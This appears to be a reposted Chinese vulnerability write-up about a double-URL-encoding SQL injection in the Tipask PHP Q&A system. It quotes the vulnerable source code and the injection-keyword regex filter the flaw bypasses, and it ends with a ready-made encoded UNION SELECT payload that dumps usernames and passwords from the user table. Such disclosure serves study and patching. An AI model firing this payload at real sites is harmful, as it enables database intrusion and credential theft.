Tipask问答系统是一款开放源码的PHP仿百度知道程序。以国人的使用习惯为设计理念,采用MVC构架,系统具有速度快,SEO友好,界面操作简洁明快等特点。
但是Tipask中存在二次编码问题,所以导致绕过系统过滤造成注入。

详细说明:
在程序入口/model/tipask.class.php init_request()中:

$this->get = taddslashes($this-> get, 1); 
$this-> post = taddslashes(array_merge($_GET, $_POST)); 
checkattack($this-> post, 'post' ); 
checkattack($this-> get, 'get' ); 
对get和post的参数进行了的addslashes,经过了checkattack检查: 
function 
checkattack($reqarr, $reqtype= 'post') { 
    $filtertable = 
array( 
'get' => '\'|(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)' , 
'post' => '\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)' , 
'cookie' => '\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)' 
); 
foreach ($reqarr as $reqkey => $reqvalue) { 
if (preg_match("/" . $filtertable[$reqtype] . "/is", $reqvalue) == 1) { 
print('Illegal operation!' ); 
exit(-1); 
        } 
    } 
} 

这个检查主要针对SQL注入,发现匹配的规则就退出
现在看漏洞处/control/question.php onajaxsearch函数:

/* 提问自动搜索已经解决的问题 */ 
    function onajaxsearch () { 
        $title = urldecode($this-> get[2]); 
        $questionlist = $_ENV[ 'question']->search_title($title, 2, 1, 0, 5); 
        include template('ajaxsearch' ); 
    } 

对get的第二个参数urldecode后直接传入SQL语句,绕过了前面的过滤和检查,导致SQL注入。

 

exp

https://ha.cker.in/?question/ajaxsearch/%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%63%6f%6e%63%61%74%28%75%73%65%72%6e%61%6d%65%2c%63%68%61%72%28%30%78%33%64%29%2c%70%61%73%73%77%6f%72%64%29%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%20%66%72%6f%6d%20%61%73%6b%5f%75%73%65%72%23

image

源链接

Hacking more

...